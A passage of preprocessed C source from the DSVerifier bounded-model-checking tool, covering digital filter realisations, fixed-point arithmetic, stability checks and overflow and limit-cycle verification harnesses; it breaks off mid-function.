double generic_timing_double_transposed_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) {
generic_timer += ((8 * hw.assembly.push) + (14 * hw.assembly.std) + (3 * hw.assembly.out) + (3 * hw.assembly.in) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli));
double *a_ptr, *b_ptr;
double yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
int j;
generic_timer += ((15 * hw.assembly.std) + (22 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (2 * hw.assembly.rcall) + (2 * hw.assembly.ld) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.brge) + (1 * hw.assembly.adiw));
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
}
generic_timer += ((70 * hw.assembly.mov) + (65 * hw.assembly.ldd) + (12 * hw.assembly.lsl) + (12 * hw.assembly.rol) + (15 * hw.assembly.std) + (6 * hw.assembly.add) + (6 * hw.assembly.adc) + (2 * hw.assembly.adiw) + (3 * hw.assembly.cpc) + (3 * hw.assembly.cp) + (5 * hw.assembly.ld) + (4 * hw.assembly.rcall) + (5 * hw.assembly.subi) + (3 * hw.assembly.rjmp) + (2 * hw.assembly.brlt) + (3 * hw.assembly.st) + (2 * hw.assembly.sbci) + (3 * hw.assembly.sbc) + (1 * hw.assembly.brge));
}
generic_timer += ((4 * hw.assembly.ldd) + (4 * hw.assembly.mov) + (8 * hw.assembly.pop) + (3 * hw.assembly.out) + (1 * hw.assembly.in) + (1 * hw.assembly.cli) + (1 * hw.assembly.adiw) + (1 * hw.assembly.ret));
return yout;
}
void double_direct_form_1_impl2(double x[], int x_size, double b[], int b_size, double a[], int a_size, double y[]){
int i = 0; int j = 0;
double v[x_size];
for(i = 0; i < x_size; i++){
v[i] = 0;
for(j = 0; j < b_size; j++){
if (j > i) break;
v[i] = v[i] + x[i-j] * b[j];
}
}
y[0] = v[0];
for(i = 1; i < x_size; i++){
y[i] = 0;
y[i] = y[i] + v[i];
for(j = 1; j < a_size; j++){
if (j > i) break;
y[i] = y[i] + y[i-j] * ((-1) * a[j]);
}
}
}
void fxp_direct_form_1_impl2(fxp_t x[], int x_size, fxp_t b[], int b_size, fxp_t a[], int a_size, fxp_t y[]){
int i = 0; int j = 0;
fxp_t v[x_size];
for(i = 0; i < x_size; i++){
v[i] = 0;
for(j = 0; j < b_size; j++){
if (j > i) break;
v[i] = fxp_add(v[i], fxp_mult(x[i-j], b[j]));
}
}
y[0] = v[0];
for(i = 1; i < x_size; i++){
y[i] = 0;
y[i] = fxp_add(y[i], v[i]);
for(j = 1; j < a_size; j++){
if (j > i) break;
y[i] = fxp_add(y[i], fxp_mult(y[i-j] , -a[j]));
}
}
}
# 26 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h"
# 1 "/usr/include/assert.h" 1 3 4
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h" 2
# 1 "/usr/include/assert.h" 1 3 4
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h" 2
int nchoosek(int n, int k){
if (k == 0)
return 1;
return (n * nchoosek(n - 1, k - 1)) / k;
}
void generate_delta_coefficients(double vetor[], double out[], int n, double delta){
int i,j;
int N = n - 1;
double sum_delta_operator;
for(i=0; i<=N; i++)
{
sum_delta_operator = 0;
for(j=0; j<=i; j++)
{
sum_delta_operator = sum_delta_operator + vetor[j]*nchoosek(N-j,i-j);
}
out[i] = internal_pow(delta,N-i)*sum_delta_operator;
}
}
void get_delta_transfer_function(double b[], double b_out[], int b_size, double a[], double a_out[], int a_size, double delta){
generate_delta_coefficients(b, b_out, b_size, delta);
generate_delta_coefficients(a, a_out, a_size, delta);
}
void get_delta_transfer_function_with_base(double b[], double b_out[], int b_size, double a[], double a_out[], int a_size, double delta){
int i,j;
int N = a_size - 1;
int M = b_size - 1;
double sum_delta_operator;
for(i=0; i<=N; i++)
{
sum_delta_operator = 0;
for(j=0; j<=i; j++)
{
sum_delta_operator = sum_delta_operator + a[j]*nchoosek(N-j,i-j);
}
a_out[i] = internal_pow(delta,N-i)*sum_delta_operator;
}
for(i=0; i<=M; i++)
{
sum_delta_operator = 0;
for(j=0; j<=i; j++)
{
sum_delta_operator = sum_delta_operator + b[j]*nchoosek(M-j,i-j);
}
b_out[i] = internal_pow(delta,M-i)*sum_delta_operator;
}
}
# 27 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/closed-loop.h" 1
# 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/closed-loop.h"
void ft_closedloop_series(double c_num[], int Nc_num, double c_den[], int Nc_den, double model_num[], int Nmodel_num, double model_den[], int Nmodel_den, double ans_num[], int Nans_num, double ans_den[], int Nans_den){
Nans_num = Nc_num + Nmodel_num - 1;
Nans_den = Nc_den + Nmodel_den - 1 ;
double den_mult [Nans_den];
poly_mult(c_num, Nc_num, model_num, Nmodel_num, ans_num, Nans_num);
poly_mult(c_den, Nc_den, model_den, Nmodel_den, den_mult, Nans_den );
poly_sum(ans_num, Nans_num , den_mult, Nans_den , ans_den, Nans_den);
}
void ft_closedloop_sensitivity(double c_num[], int Nc_num, double c_den[], int Nc_den, double model_num[], int Nmodel_num, double model_den[], int Nmodel_den, double ans_num[], int Nans_num, double ans_den[], int Nans_den){
int Nans_num_p = Nc_num + Nmodel_num-1;
Nans_den = Nc_den + Nmodel_den-1;
Nans_num = Nc_den + Nmodel_den-1;
double num_mult [Nans_num_p];
poly_mult(c_den, Nc_den, model_den, Nmodel_den, ans_num, Nans_num);
poly_mult(c_num, Nc_num, model_num, Nmodel_num, num_mult, Nans_num_p);
poly_sum(ans_num, Nans_num, num_mult, Nans_num_p, ans_den, Nans_den);
}
void ft_closedloop_feedback(double c_num[], int Nc_num, double c_den[], int Nc_den, double model_num[], int Nmodel_num, double model_den[], int Nmodel_den, double ans_num[], int Nans_num, double ans_den[], int Nans_den){
Nans_num = Nc_den + Nmodel_num - 1;
Nans_den = Nc_den + Nmodel_den - 1;
int Nnum_mult = Nc_num + Nmodel_num - 1;
double den_mult [Nans_den];
double num_mult [Nnum_mult];
poly_mult(c_num, Nc_num, model_num, Nmodel_num, num_mult, Nnum_mult);
poly_mult(c_den, Nc_den, model_den, Nmodel_den, den_mult, Nans_den);
poly_sum(num_mult, Nnum_mult, den_mult, Nans_den, ans_den, Nans_den);
poly_mult(c_den, Nc_den, model_num, Nmodel_num, ans_num, Nans_num);
}
int check_stability_closedloop(double a[], int n, double plant_num[], int p_num_size, double plant_den[], int p_den_size){
int columns = n;
double m[2 * n - 1][n];
int i,j;
int first_is_positive = 0;
double * p_num = plant_num;
double * p_den = plant_den;
double sum = 0;
for (i=0; i < n; i++){
sum += a[i];
}
__DSVERIFIER_assert(sum > 0);
sum = 0;
for (i=0; i < n; i++){
sum += a[i] * internal_pow(-1, n-1-i);
}
sum = sum * internal_pow(-1, n-1);
__DSVERIFIER_assert(sum > 0);
__DSVERIFIER_assert(internal_abs(a[n-1]) < a[0]);
for (i=0; i < 2 * n - 1; i++){
for (j=0; j < columns; j++){
m[i][j] = 0;
if (i == 0){
m[i][j] = a[j];
continue;
}
if (i % 2 != 0 ){
int x;
for(x=0; x<columns;x++){
m[i][x] = m[i-1][columns-x-1];
}
columns = columns - 1;
j = columns;
}else{
__DSVERIFIER_assert(m[i-2][0] > 0);
m[i][j] = m[i-2][j] - (m[i-2][columns] / m[i-2][0]) * m[i-1][j];
__DSVERIFIER_assert((m[0][0] >= 0) && (m[i][0] >= 0));
}
}
}
return 1;
}
# 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
extern digital_system ds;
extern digital_system plant;
extern digital_system control;
extern implementation impl;
extern filter_parameters filter;
extern hardware hw;
void initialization(){
if (impl.frac_bits >= 32){
printf("impl.frac_bits must be less than word width!\n");
}
if (impl.int_bits >= 32 - impl.frac_bits){
printf("impl.int_bits must be less than word width subtracted by precision!\n");
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4
((void) sizeof ((
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
0
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
0
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4
) ; else __assert_fail (
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
"0"
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h", 33, __extension__ __PRETTY_FUNCTION__); }))
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
;
}
if(impl.frac_bits >= 31){
_fxp_one = 0x7fffffff;
}else{
_fxp_one = (0x00000001 << impl.frac_bits);
}
_fxp_half = (0x00000001 << (impl.frac_bits - 1));
_fxp_minus_one = -(0x00000001 << impl.frac_bits);
_fxp_min = -(0x00000001 << (impl.frac_bits + impl.int_bits - 1));
_fxp_max = (0x00000001 << (impl.frac_bits + impl.int_bits - 1)) - 1;
_fxp_fmask = ((((int32_t) 1) << impl.frac_bits) - 1);
_fxp_imask = ((0x80000000) >> (32 - impl.frac_bits - 1));
_dbl_min = _fxp_min;
_dbl_min /= (1 << impl.frac_bits);
_dbl_max = _fxp_max;
_dbl_max /= (1 << impl.frac_bits);
if ((impl.scale == 0) || (impl.scale == 1)){
impl.scale = 1;
return;
}
if (impl.min != 0){
impl.min = impl.min / impl.scale;
}
if (impl.max != 0){
impl.max = impl.max / impl.scale;
}
# 80 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
}
# 29 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/state-space.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/state-space.h"
extern digital_system_state_space _controller;
extern int nStates;
extern int nInputs;
extern int nOutputs;
double double_state_space_representation(void){
double result1[4][4];
double result2[4][4];
int i, j;
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1);
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2);
double_add_matrix(nOutputs,
1,
result1,
result2,
_controller.outputs);
double_matrix_multiplication(nStates,nStates,nStates,1,_controller.A,_controller.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller.B,_controller.inputs,result2);
double_add_matrix(nStates,
1,
result1,
result2,
_controller.states);
return _controller.outputs[0][0];
}
double fxp_state_space_representation(void){
fxp_t result1[4][4];
fxp_t result2[4][4];
int i, j;
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
fxp_t A_fpx[4][4];
fxp_t B_fpx[4][4];
fxp_t C_fpx[4][4];
fxp_t D_fpx[4][4];
fxp_t states_fpx[4][4];
fxp_t inputs_fpx[4][4];
fxp_t outputs_fpx[4][4];
for(i=0; i<4;i++){
for(j=0; j<4;j++){
A_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
B_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
C_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
D_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
states_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
inputs_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
outputs_fpx[i][j]=0;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
A_fpx[i][j]= fxp_double_to_fxp(_controller.A[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nInputs;j++){
B_fpx[i][j]= fxp_double_to_fxp(_controller.B[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nStates;j++){
C_fpx[i][j]= fxp_double_to_fxp(_controller.C[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
D_fpx[i][j]= fxp_double_to_fxp(_controller.D[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
states_fpx[i][j]= fxp_double_to_fxp(_controller.states[i][j]);
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
inputs_fpx[i][j]= fxp_double_to_fxp(_controller.inputs[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
outputs_fpx[i][j]= fxp_double_to_fxp(_controller.outputs[i][j]);
}
}
fxp_matrix_multiplication(nOutputs,nStates,nStates,1,C_fpx,states_fpx,result1);
fxp_matrix_multiplication(nOutputs,nInputs,nInputs,1,D_fpx,inputs_fpx,result2);
fxp_add_matrix(nOutputs,
1,
result1,
result2,
outputs_fpx);
fxp_matrix_multiplication(nStates,nStates,nStates,1,A_fpx,states_fpx,result1);
fxp_matrix_multiplication(nStates,nInputs,nInputs,1,B_fpx,inputs_fpx,result2);
fxp_add_matrix(nStates,
1,
result1,
result2,
states_fpx);
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
_controller.states[i][j]= fxp_to_double(states_fpx[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
_controller.outputs[i][j]= fxp_to_double(outputs_fpx[i][j]);
}
}
return _controller.outputs[0][0];
}
# 30 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/filter_functions.h" 1
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/filter_functions.h"
double sinTyl(double x, int precision){
double sine;
double xsquared = x*x;
double aux;
if (precision < 0)
{
printf("Warning: Function sinTyl from bmc/core/filter_functions.h: "
"Precision must be a positive integer. Assuming 0 precision\n");
precision = 0;
}
if (precision >= 0)
{
aux = 0;
sine = aux;
if (precision >= 1)
{
aux = x;
sine += aux;
if (precision >= 2)
{
aux = aux*xsquared;
sine -= aux/6;
if (precision >= 3)
{
aux = aux*xsquared;
sine +=aux/120;
if(precision >=4)
{
aux = aux*xsquared;
sine -=aux/5040;
if(precision >= 5)
{
aux = aux*xsquared;
sine +=aux/362880;
if(precision >= 6)
{
aux = aux*xsquared;
sine -=aux/39916800;
if (precision >= 7)
printf("Warning: Function sinTyl "
"from bmc/core/filter_functions.h: Precision "
"representation exceeded. Assuming maximum precision of 6\n");
}
}
}
}
}
}
}
return sine;
}
double cosTyl(double x, int precision){
double cosine;
double xsquared = x*x;
double aux;
if (precision < 0)
{
printf("Warning: Function cosTyl from bmc/core/filter_functions.h: "
"Precision must be a positive integer. Assuming 0 precision\n");
precision = 0;
}
if (precision >= 0)
{
aux = 0;
cosine = aux;
if (precision >= 1)
{
aux = 1;
cosine = 1;
if (precision >= 2)
{
aux = xsquared;
cosine -= aux/2;
if (precision >= 3)
{
aux = aux*xsquared;
cosine += aux/24;
if(precision >=4)
{
aux = aux*xsquared;
cosine -=aux/720;
if(precision >= 5)
{
aux = aux*xsquared;
cosine +=aux/40320;
if(precision >= 6)
{
aux = aux*xsquared;
cosine -=aux/3628800;
if (precision >= 7) printf("Warning: Function sinTyl "
"from bmc/core/filter_functions.h: Precision "
"representation exceeded. Assuming maximum precision of 6\n");
}
}
}
}
}
}
}
return cosine;
}
double atanTyl(double x, int precision){
double atangent;
double xsquared = x*x;
double aux;
if (precision < 0)
{
printf("Warning: Function sinTyl from bmc/core/filter_functions.h: "
"Precision must be a positive integer. Assuming 0 precision\n");
precision = 0;
}
if (precision >= 0)
{
aux = 0;
atangent = aux;
if (precision >= 1)
{
aux = x;
atangent = aux;
if (precision >= 2)
{
aux = xsquared;
atangent -= aux/3;
if (precision >= 3)
{
aux = aux*xsquared;
atangent += aux/5;
if(precision >=4)
{
aux = aux*xsquared;
atangent -=aux/7;
if (precision >= 7)
printf("Warning: Function sinTyl from bmc/core/filter_functions.h: "
"Precision representation exceeded. Assuming maximum precision of 4\n");
}
}
}
}
}
return atangent;
}
float sqrt1(const float x)
{
const float xhalf = 0.5f*x;
union
{
float x;
int i;
} u;
u.x = x;
u.i = 0x5f3759df - (u.i >> 1);
return x*u.x*(1.5f - xhalf*u.x*u.x);
}
float sqrt2(const float x)
{
union
{
int i;
float x;
} u;
u.x = x;
u.i = (1<<29) + (u.i >> 1) - (1<<22);
return u.x;
}
float fabsolut(float x)
{
if (x < 0)
x = -x;
return x;
}
static float sqrt3(float val)
{
float x = val/10;
float dx;
double diff;
double min_tol = 0.00001;
int i, flag;
flag = 0;
if (val == 0 ) x = 0;
else
{
for (i=1;i<20;i++)
{
if (!flag)
{
dx = (val - (x*x)) / (2.0 * x);
x = x + dx;
diff = val - (x*x);
if (fabsolut(diff) <= min_tol) flag = 1;
}
else x =x;
}
}
return (x);
}
# 31 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h"
int nondet_int();
float nondet_float();
extern digital_system ds;
extern implementation impl;
int verify_overflow(void) {
fxp_t a_fxp[ds.a_size];
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
# 73 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h"
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
fxp_t y[X_SIZE_VALUE];
fxp_t x[X_SIZE_VALUE];
int i;
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = nondet_int();
__DSVERIFIER_assume(x[i] >= min_fxp && x[i] <= max_fxp);
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
fxp_t yaux[ds.a_size];
fxp_t xaux[ds.b_size];
fxp_t waux[Nw];
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
}
for (i = 0; i < Nw; ++i) {
waux[i] = 0;
}
fxp_t xk, temp;
fxp_t *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
for (i = 0; i < X_SIZE_VALUE; ++i) {
# 129 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h"
y[i] = fxp_transposed_direct_form_2(waux, x[i], a_fxp, b_fxp, ds.a_size, ds.b_size);
# 174 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h"
}
overflow_mode = 1;
fxp_verify_overflow_array(y, X_SIZE_VALUE);
return 0;
}
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 1
# 15 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
extern digital_system ds;
extern implementation impl;
extern digital_system_state_space _controller;
extern int nStates;
extern int nInputs;
extern int nOutputs;
int verify_limit_cycle_state_space(void){
double stateMatrix[4][4];
double outputMatrix[4][4];
double arrayLimitCycle[4];
double result1[4][4];
double result2[4][4];
int i, j, k;
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
stateMatrix[i][j]=0;
outputMatrix[i][j]=0;
}
}
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1);
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2);
double_add_matrix(nOutputs,
1,
result1,
result2,
_controller.outputs);
k = 0;
for (i = 1; i < 0; i++) {
double_matrix_multiplication(nStates,nStates,nStates,1,_controller.A,_controller.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller.B,_controller.inputs,result2);
double_add_matrix(nStates,
1,
result1,
result2,
_controller.states);
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1);
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2);
double_add_matrix(nOutputs,
1,
result1,
result2,
_controller.outputs);
int l;
for(l = 0; l < nStates; l++){
stateMatrix[l][k] = _controller.states[l][0];
}
for(l = 0; l < nOutputs; l++){
stateMatrix[l][k] = _controller.outputs[l][0];
}
k++;
}
printf("#matrix STATES -------------------------------");
print_matrix(stateMatrix,nStates,0);
printf("#matrix OUTPUTS -------------------------------");
print_matrix(outputMatrix,nOutputs,0);
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
((void) sizeof ((
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
0
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
0
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
) ; else __assert_fail (
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
"0"
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h", 93, __extension__ __PRETTY_FUNCTION__); }))
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
;
for(i=0; i<nStates;i++){
for(j=0; j<0;j++){
arrayLimitCycle[j] = stateMatrix[i][j];
}
double_check_persistent_limit_cycle(arrayLimitCycle,0);
}
for(i=0; i<nOutputs;i++){
for(j=0; j<0;j++){
arrayLimitCycle[j] = outputMatrix[i][j];
}
double_check_persistent_limit_cycle(arrayLimitCycle,0);
}
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
((void) sizeof ((
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
0
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
0
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
) ; else __assert_fail (
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
"0"
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h", 110, __extension__ __PRETTY_FUNCTION__); }))
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
;
}
int verify_limit_cycle(void){
overflow_mode = 3;
int i;
int Set_xsize_at_least_two_times_Na = 2 * ds.a_size;
printf("X_SIZE must be at least 2 * ds.a_size");
__DSVERIFIER_assert(X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na);
fxp_t a_fxp[ds.a_size];
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
# 168 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
fxp_t y[X_SIZE_VALUE];
fxp_t x[X_SIZE_VALUE];
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
fxp_t xaux[ds.b_size];
int nondet_constant_input = nondet_int();
__DSVERIFIER_assume(nondet_constant_input >= min_fxp && nondet_constant_input <= max_fxp);
for (i = 0; i < X_SIZE_VALUE; ++i) {
x[i] = nondet_constant_input;
y[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = nondet_constant_input;
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
fxp_t yaux[ds.a_size];
fxp_t y0[ds.a_size];
fxp_t waux[Nw];
fxp_t w0[Nw];
# 206 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
for (i = 0; i < Nw; ++i) {
waux[i] = nondet_int();
__DSVERIFIER_assume(waux[i] >= min_fxp && waux[i] <= max_fxp);
w0[i] = waux[i];
}
fxp_t xk, temp;
fxp_t *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
for(i=0; i<X_SIZE_VALUE; ++i){
# 234 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
y[i] = fxp_transposed_direct_form_2(waux, x[i], a_fxp, b_fxp, ds.a_size, ds.b_size);
# 278 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
}
fxp_check_persistent_limit_cycle(y, X_SIZE_VALUE);
return 0;
}
# 34 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h"
extern digital_system ds;
extern implementation impl;
int verify_error(void){
overflow_mode = 2;
double a_cascade[100];
int a_cascade_size;
double b_cascade[100];
int b_cascade_size;
fxp_t a_fxp[ds.a_size];
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
